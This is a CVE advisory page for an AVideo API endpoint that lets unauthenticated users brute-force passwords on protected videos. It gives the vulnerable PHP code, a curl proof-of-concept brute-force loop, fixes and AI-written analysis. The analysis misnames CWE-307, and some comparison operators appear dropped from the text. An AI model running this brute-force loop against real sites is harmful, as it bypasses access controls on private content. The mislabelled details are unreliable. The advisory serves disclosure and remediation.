PHP
CVE-2026-33763
MEDIUM
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.
Details
The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:
public function get_api_video_password_is_correct($parameters)
{
$obj = new stdClass();
$obj->videos_id = intval($parameters['videos_id']);
$obj->passwordIsCorrect = true;
$error = true;
$msg = '';
if (!empty($obj->videos_id)) {
$error = false;
$video = new Video('', '', $obj->videos_id);
$password = $video->getVideo_password();
if (!empty($password)) {
$obj->passwordIsCorrect = $password == $parameters['video_password'];
}
} else {
$msg = 'Videos id is required';
}
return new ApiObject($msg, $error, $obj);
}The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:
public function get($parameters) {
// ... optional user login if credentials provided ...
$APIName = $parameters['APIName'];
if (method_exists($this, "get_api_$APIName")) {
$str = "\$object = \$this->get_api_$APIName(\$parameters);";
eval($str);
}
}The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.
Additionally, video passwords are stored in plaintext (objects/video.php:523-527):
public function setVideo_password($video_password) {
AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
$this->video_password = trim($video_password);
}The comparison at line 1125 uses loose equality () rather than strict equality (=).
PoC
Step 1: Identify a password-protected video
curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'A non-empty value (e.g., "1") indicates the video is password-protected.
Step 2: Test incorrect password (oracle returns false)
curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"Expected response:
{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}Step 3: Brute-force the password
for pw in password 123456 secret admin test video1 qwerty; do
result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
echo "$pw: $result"
[ "$result" = "true" ] && echo "FOUND: $pw" && break
doneNo rate limiting is encountered regardless of request volume.
Step 4: Unlock the video with the discovered password
curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txtThe password is stored in the session (CustomizeUser.php:806-807) granting persistent access.
Impact
An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.
Recommended Fix
- Add rate limiting to the endpoint using the existing
checkRateLimit()mechanism:
public function get_api_video_password_is_correct($parameters)
{
$this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP
$obj = new stdClass();
$obj->videos_id = intval($parameters['videos_id']);
// ... rest of existing code
}- Hash video passwords using
password_hash()/password_verify()instead of plaintext storage and loose comparison:
// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);
// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);- Use strict comparison (
===) if plaintext passwords must be retained temporarily during migration.
AnalysisAI
AVideo password verification API endpoint allows unauthenticated attackers to brute-force video access passwords at network speed with no rate limiting, enabling compromise of password-protected video content across the platform. The vulnerable endpoint pkg:composer/wwbn_avideo returns a boolean confirmation for any password guess without authentication, CAPTCHA, or throttling mechanisms, combined with plaintext password storage and loose equality comparison that further weakens defenses. Publicly available exploit code exists demonstrating rapid password enumeration against any video ID.
Technical ContextAI
The vulnerability resides in AVideo (pkg:composer/wwbn_avideo), a PHP-based video hosting platform. The root cause is classified under CWE-307 (Improper Restriction of Rendered UI Layers or Frames) and involves multiple weaknesses: (1) an unauthenticated API endpoint at plugin/API/API.php:1111-1133 that performs password verification without rate limiting via the get() dispatcher at line 191-209, (2) plaintext password storage in objects/video.php:523-527 without cryptographic hashing, and (3) loose equality comparison () instead of strict (=) at line 1125. The application has an existing checkRateLimit() mechanism used elsewhere (e.g., user registration at line 4232, user deactivation at line 5705) but it was not applied to this endpoint. The dispatcher uses eval() to dynamically route requests to API methods, creating a flexible but unauthenticated exposure surface.
RemediationAI
Apply the upstream fix from commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 available at https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135. The patch implements rate limiting via checkRateLimit('video_password_check', 5, 300) to allow 5 password verification attempts per 5 minutes per IP address, and upgrades password storage to use password_hash()/password_verify() with PASSWORD_DEFAULT algorithm instead of plaintext comparison. Until patching is possible, implement network-level rate limiting on the /plugin/API/get.json.php endpoint using Web Application Firewall (WAF) rules to restrict requests with APIName=video_password_is_correct to 5 per 5 minutes per source IP, disable password-protected videos if not operationally critical, and restrict API endpoint access to trusted IP ranges via reverse proxy authentication. Additionally, audit logs for brute-force attempt patterns (multiple failed password_is_correct checks for the same video_id) to detect active exploitation.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today